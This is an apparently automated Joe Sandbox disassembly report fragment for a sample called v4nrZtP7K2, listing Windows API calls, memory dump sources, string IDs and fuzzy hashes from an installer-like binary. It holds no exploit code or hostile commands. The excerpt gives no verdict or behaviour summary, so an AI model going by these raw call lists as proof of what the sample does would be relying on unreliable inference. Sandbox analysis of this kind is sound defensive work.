                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-3250253040
                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(000162E1,00000064,0001AD88), ref: 00402E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 722711167-2449383134
                                                                                      • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                      • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                      APIs
                                                                                        • Part of subcall function 6FFB121B: GlobalAlloc.KERNELBASE(00000040,?,6FFB123B,?,6FFB12DF,00000019,6FFB11BE,-000000A0), ref: 6FFB1225
                                                                                      • GlobalFree.KERNEL32(?), ref: 6FFB2657
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB268C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 88c30e1c4ffde3c228755ef75e115e5f1ba46b74e2c71c8aa8dd5a09d59dcfc8
                                                                                      • Instruction ID: c348dce76030f733a58f679d1887c393ff0bb0de10852f7070ea717fe4569d94
                                                                                      • Opcode Fuzzy Hash: 88c30e1c4ffde3c228755ef75e115e5f1ba46b74e2c71c8aa8dd5a09d59dcfc8
                                                                                      • Instruction Fuzzy Hash: 3831CD32118501DFCB168F6AC9D4D2A7BB6FF87354314466DF541C7264C736A825CB21
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                      • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                      • API String ID: 3540041739-1320723960
                                                                                      • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                      • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp$C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll
                                                                                      • API String ID: 3109718747-404885607
                                                                                      • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                      • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                      • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                      • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 2979337801-0
                                                                                      • Opcode ID: d5496dd476aad18d91f711e80d01e8462df36306bc2255d6adc335857816699c
                                                                                      • Instruction ID: a43ef2960d19ba322ef9f89523e49aa1c2bce776c392b031375e9c496d73480c
                                                                                      • Opcode Fuzzy Hash: d5496dd476aad18d91f711e80d01e8462df36306bc2255d6adc335857816699c
                                                                                      • Instruction Fuzzy Hash: D451C33AD04159AA8B219FBBC9805AEBBBDEF46358B1043DFD404E7240D771BE8187A1
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB24D6
                                                                                        • Part of subcall function 6FFB122C: lstrcpynW.KERNEL32(00000000,?,6FFB12DF,00000019,6FFB11BE,-000000A0), ref: 6FFB123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6FFB245C
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FFB2477
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: f5a2bfac3b3f24645b7327825b0cdbeeae7498422e67f1878a2e0967f843203d
                                                                                      • Instruction ID: cfa6f9b213c4342137cb42a6994ebf1cdef3dc50dc302fa5d3608d5d76d29b62
                                                                                      • Opcode Fuzzy Hash: f5a2bfac3b3f24645b7327825b0cdbeeae7498422e67f1878a2e0967f843203d
                                                                                      • Instruction Fuzzy Hash: 6841F0B1108305DFD711EF3AD884A6A77B8FF4A360F044A5EE046C7A91EF72A444CB61
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                      • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FFB21EC,?,00000808), ref: 6FFB1635
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FFB21EC,?,00000808), ref: 6FFB163C
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FFB21EC,?,00000808), ref: 6FFB1650
                                                                                      • GetProcAddress.KERNEL32(6FFB21EC,00000000), ref: 6FFB1657
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB1660
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 98a75ba776b49f5fa1a0ba2ab8685a86290a2f593379fe6df078d2d74e90c8a3
                                                                                      • Instruction ID: 030490e54e6661d91aac81a529b8958543336bdbbe0c88e4fb0e54bd9df989a7
                                                                                      • Opcode Fuzzy Hash: 98a75ba776b49f5fa1a0ba2ab8685a86290a2f593379fe6df078d2d74e90c8a3
                                                                                      • Instruction Fuzzy Hash: 2FF037721165387FDA201AA78D4CD9B7E9CEF8B2F5B110311F718D12A0C5614C11DBF1
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                      • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
